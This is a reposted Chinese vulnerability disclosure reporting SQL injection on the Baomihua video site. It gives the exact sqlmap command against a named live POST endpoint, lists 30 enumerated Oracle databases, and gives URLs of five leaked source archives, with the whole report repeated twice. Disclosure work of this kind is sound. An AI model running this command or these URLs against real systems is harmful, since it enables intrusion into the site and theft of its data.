神刀安全网

漏洞标题: 爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

漏洞详情

披露状态:

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

code 区域
注入点:F:/sqlmap>sqlmap.py -u "http://www.baomihua.com/space/RankAllList.aspx" --data "classid=774" --dbs

数据库30个 可裤裤查询

code 区域
back-end DBMS: Oracle
available databases [30]:
[*] APEX_030200
[*] APPQOSSYS
[*] CHEAT
[*] CHENZH
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIGZ
[*] LINJS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] POMOHO
[*] POMOHOMOBILE
[*] QINYM
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] WUXG
[*] XDB
[*] XIAL
[*] ZHANGXL
[*] ZHAOLH
[*] ZLY

当前库POMOHO 2449个表 跑的实在太慢了2分钟一个表 跑了2小时才几十个表估算一下要80个小时才可以跑完 这里就证明下危害

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库SYS也跑了下 976张表

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库OLAPSYS 126张表

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

跑了几个数据量大的库证明下危害 表的话要好几天就不深入了

还有几处源代码泄露的

code 区域
1:http://static.baomihua.com/doc.rar
2:http://show.baomihua.com/baomihua.tar.gz
3:http://resources.baomihua.com/swf.rar
4:http://reg.baomihua.com/reg.rar
5:http://pvstat.baomihua.com/wwwroot.rar

导致敏感信息泄露配置文件等等 艾米直播网站的

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

邮箱服务器信息

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库配置信息

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

这边没装打不开配置文件

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

漏洞证明:

code 区域
注入点:F:/sqlmap>sqlmap.py -u "http://www.baomihua.com/space/RankAllList.aspx" --data "classid=774" --dbs

数据库30个 可裤裤查询

code 区域
back-end DBMS: Oracle
available databases [30]:
[*] APEX_030200
[*] APPQOSSYS
[*] CHEAT
[*] CHENZH
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIGZ
[*] LINJS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] POMOHO
[*] POMOHOMOBILE
[*] QINYM
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] WUXG
[*] XDB
[*] XIAL
[*] ZHANGXL
[*] ZHAOLH
[*] ZLY

当前库POMOHO 2449个表 跑的实在太慢了2分钟一个表 跑了2小时才几十个表估算一下要80个小时才可以跑完 这里就证明下危害

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库SYS也跑了下 976张表

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库OLAPSYS 126张表

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

跑了几个数据量大的库证明下危害 表的话要好几天就不深入了

还有几处源代码泄露的

code 区域
1:http://static.baomihua.com/doc.rar
2:http://show.baomihua.com/baomihua.tar.gz
3:http://resources.baomihua.com/swf.rar
4:http://reg.baomihua.com/reg.rar
5:http://pvstat.baomihua.com/wwwroot.rar

导致敏感信息泄露配置文件等等 艾米直播网站的

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

邮箱服务器信息

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

数据库配置信息

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

这边没装打不开配置文件

漏洞标题:  爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮